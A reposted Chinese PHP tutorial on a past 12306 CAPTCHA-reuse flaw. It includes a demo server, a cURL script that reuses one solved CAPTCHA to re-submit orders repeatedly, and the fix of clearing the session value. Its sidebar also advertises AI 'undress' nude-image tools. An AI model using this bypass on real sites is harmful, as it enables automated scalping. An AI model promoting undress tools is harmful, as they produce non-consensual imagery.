危险的验证码 –12306.cn曾经犯下的错误-php手册-php.cn

Home

php教程

php手册

危险的验证码 –12306.cn曾经犯下的错误

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 06, 2016 pm 08:07 PM

Danger Spring Festival mistake verify

春运期间，网上出现一个刷票的插件，为我们买票提供了太多的便利。用刷票软件进行刷票，验证码还是要输入一次的，输入完验证码之后，便可以使用自动提交订单直至订票成功，免去了我们失败一次又一次重试之苦。这一切都是利用了网站验证码的漏洞，验证

春运期间，网上出现一个刷票的插件，为我们买票提供了太多的便利。

用刷票软件进行刷票，验证码还是要输入一次的，输入完验证码之后，便可以使用自动提交订单直至订票成功，免去了我们失败一次又一次重试之苦。这一切都是利用了网站验证码的漏洞，验证码验证通过之后没有马上更新，所以下次请求继续使用这个验证码就行了。

12306

上 Demo 喽：

----------------------------------------模拟12306-----------------------------------------------------------

<?php session_start();
if(!empty($_POST)) {
	$time = date('Y-m-d H:i:s');
	if($_SESSION['vcode'] == $_POST['vcode']) {
		//购票程序
		echo "[{$time}]验证码:  " , $_POST['vcode'], ", 尝试买票!!";
	} else {
		echo "[{$time}]验证码错误!!";
	}
} else {
?>

Copy after login

--------------------------------------------------模拟刷票----------------------------------------------------------------------------

<?php //Cookie文件， 保存SESSION_ID, 要确保提交和验证码在一个会话中
$cookie_jar =  dirname(__FILE__).'/cookie.txt';
if(!empty($_GET['img'])) {
	$url = 'http://127.0.0.1/vcode.php';
	$ch = curl_init($url);
	curl_setopt($ch,CURLOPT_COOKIEJAR, $cookie_jar);//把返回来的cookie信息保存在文件中
	curl_exec($ch);
	curl_close($ch);
	exit();
} else {
	//把验证码抓下来
	if(empty($_POST)) {
		$ch = curl_init();

		$url = 'http://127.0.0.1/12306.php';   //这里是所要提交的页面，改成你需要的
		$str = file_get_contents($url);
		$str = str_replace('vcode.php', '?img=1', $str);
		echo $str;
	} else {
		//刷票10次
		for ($i =0; $i <10 ; ++$i) {
			$url = 'http://127.0.0.1/12306.php';
			$ch = curl_init($url);
			curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
			curl_setopt($ch,CURLOPT_COOKIEFILE, $cookie_jar);//把返回来的cookie信息保存在文件中
			curl_setopt($ch,CURLOPT_POST, 1);
			curl_setopt($ch,CURLOPT_POSTFIELDS, http_build_query($_POST));
			//设置请求的来源(referrer)
			$result = curl_exec($ch);
			echo $result, "<br>";
			curl_close($ch);
			sleep(rand(1,3));
		}
	}
}

Copy after login

运行结果，有图有真相：

curl

curl result

只输入一次验证码，就可以无限的刷票了！！！

解决的办法，很简单：在Session验证通过之后直接把 $_SESSION['vcode'] 干掉!!!

测试代码下载

声明: 本文采用 CC BY-NC-SA 3.0 协议进行授权

转载请注明来源：小景的博客

本文链接地址：http://www.phpv5.com/blog/vcod

Statement of this Website

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress images for free

Clothoff.io

AI clothes remover

AI Hentai Generator

Generate AI Hentai for free.

Hot Article

R.E.P.O. Energy Crystals Explained and What They Do (Yellow Crystal)

3 weeks ago By 尊渡假赌尊渡假赌尊渡假赌

R.E.P.O. Best Graphic Settings

3 weeks ago By 尊渡假赌尊渡假赌尊渡假赌

Assassin's Creed Shadows: Seashell Riddle Solution

2 weeks ago By DDD

R.E.P.O. How to Fix Audio if You Can't Hear Anyone

3 weeks ago By 尊渡假赌尊渡假赌尊渡假赌

WWE 2K25: How To Unlock Everything In MyRise

3 weeks ago By 尊渡假赌尊渡假赌尊渡假赌

Hot Tools

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

God-level code editing software (SublimeText3)

Hot Topics

Where is the login entrance for gmail email?

7460

CakePHP Tutorial

1376

What is the format of the account name of steam

win11 activation key permanent

nyt connections hints and answers

Related knowledge

Unable to complete operation (Error 0x0000771) Printer error Mar 16, 2024 pm 03:50 PM

If you encounter an error message when using your printer, such as the operation could not be completed (error 0x00000771), it may be because the printer has been disconnected. In this case, you can solve the problem through the following methods. In this article, we will discuss how to fix this issue on Windows 11/10 PC. The entire error message says: The operation could not be completed (error 0x0000771). The specified printer has been deleted. Fix 0x00000771 Printer Error on Windows PC To fix Printer Error the operation could not be completed (Error 0x0000771), the specified printer has been deleted on Windows 11/10 PC, follow this solution: Restart Print Spool

Windows Sandbox startup failed - Access Denied Feb 19, 2024 pm 01:00 PM

Does Windows Sandbox terminate with Windows Sandbox Unable to Start, Error 0x80070005, Access Denied message? Some users reported that Windows Sandbox cannot be opened. If you also encounter this error, you can follow this guide to fix it. Windows Sandbox failed to start - Access Denied If Windows Sandbox terminates with Windows Sandbox Unable to Start, Error 0x80070005, Access Denied message, make sure you are logged in as an administrator. This type of error is usually caused by insufficient permissions. So try logging in as an administrator and see if that resolves the issue. If the problem persists, you can try the following solutions: Run the Wi-Fi as administrator

Revealing the causes of HTTP status code 460 Feb 19, 2024 pm 08:30 PM

Decrypting HTTP status code 460: Why does this error occur? Introduction: In daily network use, we often encounter various error prompts, including HTTP status codes. These status codes are a mechanism defined by the HTTP protocol to indicate the processing of a request. Among these status codes, there is a relatively rare error code, namely 460. This article will delve into this error code and explain why this error occurs. Definition of HTTP status code 460: First, we need to understand the basics of HTTP status code

Solution to Windows Update prompt Error 0x8024401c error Jun 08, 2024 pm 12:18 PM

Table of Contents Solution 1 Solution 21. Delete the temporary files of Windows update 2. Repair damaged system files 3. View and modify registry entries 4. Turn off the network card IPv6 5. Run the WindowsUpdateTroubleshooter tool to repair 6. Turn off the firewall and other related anti-virus software. 7. Close the WidowsUpdate service. Solution 3 Solution 4 "0x8024401c" error occurs during Windows update on Huawei computers Symptom Problem Cause Solution Still not solved? Recently, the web server needs to be updated due to system vulnerabilities. After logging in to the server, the update prompts error code 0x8024401c. Solution 1

How to verify signature in PDF Feb 18, 2024 pm 05:33 PM

We usually receive PDF files from the government or other agencies, some with digital signatures. After verifying the signature, we see the SignatureValid message and a green check mark. If the signature is not verified, the validity is unknown. Verifying signatures is important, let’s see how to do it in PDF. How to Verify Signatures in PDF Verifying signatures in PDF format makes it more trustworthy and the document more likely to be accepted. You can verify signatures in PDF documents in the following ways. Open the PDF in Adobe Reader Right-click the signature and select Show Signature Properties Click the Show Signer Certificate button Add the signature to the Trusted Certificates list from the Trust tab Click Verify Signature to complete the verification Let

The server encountered an error, 0x80070003, while creating a new virtual machine. Feb 19, 2024 pm 02:30 PM

If you encounter error code 0x80070003 when using Hyper-V to create or start a virtual machine, it may be caused by permission issues, file corruption, or configuration errors. Solutions include checking file permissions, repairing damaged files, ensuring correct configuration, and more. This problem can be solved by ruling out the different possibilities one by one. The entire error message looks like this: The server encountered an error while creating [virtual machine name]. Unable to create new virtual machine. Unable to access configuration store: The system cannot find the path specified. (0x80070003). Some possible causes of this error include: The virtual machine file is corrupted. This can happen due to malware, virus or adware attacks. Although the likelihood of this happening is low, you can't completely

Detailed method to unblock using WeChat friend-assisted verification Mar 25, 2024 pm 01:26 PM

1. After opening WeChat, click the search icon, enter WeChat team, and click the service below to enter. 2. After entering, click the self-service tool option in the lower left corner. 3. After clicking, in the options above, click the option of unblocking/appealing for auxiliary verification.

Fix Pioneer Error Code Kadena-Keesler Feb 19, 2024 pm 02:20 PM

If you encounter the Kadena-Keesler error while playing Call of Duty: Vanguard, this article may be helpful to you. According to feedback from some players, the game has this problem on Windows PC, Xbox, PlayStation and other platforms. When triggered, you may receive the following error message: Connection failed No network connection failed. You must have an active internet connection to play online or over a local network. [Reason: Kadena-Keesler] You may also receive the following error message: Connection failed Unable to access online services. [Reason: Kadena-Keesler] Another instance of this error on Xbox is as follows: You must have an active network connection

See all articles